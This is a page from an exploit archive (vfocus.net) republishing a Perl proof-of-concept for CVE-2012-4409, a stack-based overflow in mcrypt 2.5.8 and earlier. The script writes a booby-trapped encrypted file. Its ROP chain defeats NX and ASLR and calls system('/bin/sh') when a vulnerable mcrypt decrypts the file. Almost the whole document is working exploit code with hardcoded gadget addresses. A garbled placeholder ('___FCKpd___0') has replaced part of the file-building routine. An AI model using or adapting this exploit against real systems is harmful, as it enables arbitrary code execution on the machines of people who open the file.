首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
mcrypt <= 2.5.8 STACK based overflow Vulnerability
来源:vfocus.net 作者:Tosh 发布时间:2012-11-26  
#!/usr/bin/perl

# Title          : mcrypt <= 2.5.8 STACK based overflow
# Date           : 23/11/2012
# Exploit Author : Tosh
# CVE            : CVE-2012-4409 
# Patch          : http://www.openwall.com/lists/oss-security/2012/09/06/8
# Tested on      : Archlinux 3.6.6-1, without SSP


# This script exploit a stack based overflow in mcrypt <= 2.5.8.
# It bypass NX and ASLR protections, but no SSP.

# This exploit craft a crypted file and arbitrary code may be executed if the file is decrypted with a vulnerable version
# of mcrypt. The vulnerable function is check_file_head(), present in src/extra.c. See the CVE details or the patch for more
# informations.

# Payload must be adjusted on others plateforms, here is just a Proof of Concept :) 

use strict;
use warnings;

my $filename = 'fake.nc';

my $file;
my $payload;

print "[+] Build payload.\n";
$payload = payload();

print "[+] Build file.\n";
$file = build_file($payload);

print "[+] Writing $filename.\n";
write_file();

print "[+] DONE.\n";

sub write_file {
    die("[-] Can't open $filename : $!\n") unless(open F, '>', $filename);
    print F $file;
    close F;
}

sub build_file {
# magic 
    $file .= "\x00m\x03";

# flags
    $file .= pack('C', 1 << 6);

# algorithm
    $file .= "H\@Ck3d\x00";

# keysize
    $file .= pack('S', 0xdead);

# mode
    $file .= "h\@cK3d\x00";

# keymode
    $file .= "H\@CK3D\x00";

# sflags
    $file .= "\xff";

# payload
    $file .= 
___FCKpd___0
[0]; return $file; } sub payload { my $saved_eip_off = 0x71; # Buffer len for overwrite saved EIP my $v_local_1 = 0x0805b000; # Local variable 1 overwriten my $v_local_2 = 0x08048007; # Local variable 2 overwriten my $ret_sled = 5; # Offset between saved EIP and local variables my $strcpy_plt = 0x080499f0; # strcpy@plt address my $fopen64_got = 0x0805b1c8; # fopen64 got entry my $system_off = 0xfffd6b30; # fopen64 - system my $w_mem = 0x0805b000; # writable memory, without ASLR my $pop2_ret = 0x08055a63; # pop; pop; ret my $ret = 0x0805a5ed; # ret my $pop_ebx = 0x08056186; # pop ebx; ret my $pop_edi = 0x08053460; # pop edi; ret my $xchg_eax = 0x080517a4; # xchg eax, edi; ret my $add_eax = 0x0804dabf; # add eax,[ebx-0x2776e73c]; pop ebx; ret my $call_eax = 0x0804b357; # call eax; leave; ret my $payload; $payload .= "A"x$saved_eip_off; $payload .= pack('L', $ret) x $ret_sled; $payload .= pack('L', $pop2_ret); $payload .= pack('L', $v_local_1); $payload .= pack('L', $v_local_2); # Copy "/bin/" in +W memory $payload .= pack('L', $strcpy_plt); $payload .= pack('L', $pop2_ret); $payload .= pack('L', $w_mem + 0x00); $payload .= pack('L', 0x08057fc2); # Copy "sh" + "\x00" in +W memory $payload .= pack('L', $strcpy_plt); $payload .= pack('L', $pop2_ret); $payload .= pack('L', $w_mem + 0x05); $payload .= pack('L', 0x08048bab); # Calc system() address with fopen64 GOT entry $payload .= pack('L', $pop_ebx); $payload .= pack('L', $fopen64_got + 0x2776e73c); $payload .= pack('L', $pop_edi); $payload .= pack('L', $system_off); $payload .= pack('L', $xchg_eax); $payload .= pack('L', $add_eax); $payload .= "HaCk"; # Call system("/bin/sh") $payload .= pack('L', $call_eax); $payload .= pack('L', $w_mem); die("[-] Payload too long !\n") if(length $payload > 0xfe); return $payload; }

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple QuickTime 7.7.2 TeXML St
·Twitter 5.0 Eavesdropping Proo
·TrouSerS Denial Of Service Vul
·BlazeVideo HDTV Player 6.6 Pro
·Aviosoft Digital TV Player Pro
·lighttpd 1.4.31 Denial of Serv
·mcrypt <= 2.6.8 stack-based bu
·NetIQ Privileged User Manager
·Apple QuickTime 7.7.2 MIME Typ
·Narcissus Image Configuration
·UMPlayer Portable 0.95 Crash P
·Akeni LAN 1.2.118 Filter Bypas
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved